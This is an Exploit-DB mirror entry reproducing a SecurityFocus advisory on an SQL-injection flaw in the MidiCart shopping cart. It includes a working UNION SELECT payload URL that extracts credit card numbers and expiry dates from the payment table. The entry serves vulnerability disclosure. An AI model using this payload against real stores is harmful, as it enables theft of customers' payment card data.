exploit-db-mirror/platforms/php/webapps/25616.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

11 lines
No EOL
828 B
Text
Executable file

source: http://www.securityfocus.com/bid/13514/info
MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect both the PHP and ASP versions of MidiCart Shopping Cart.
http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION]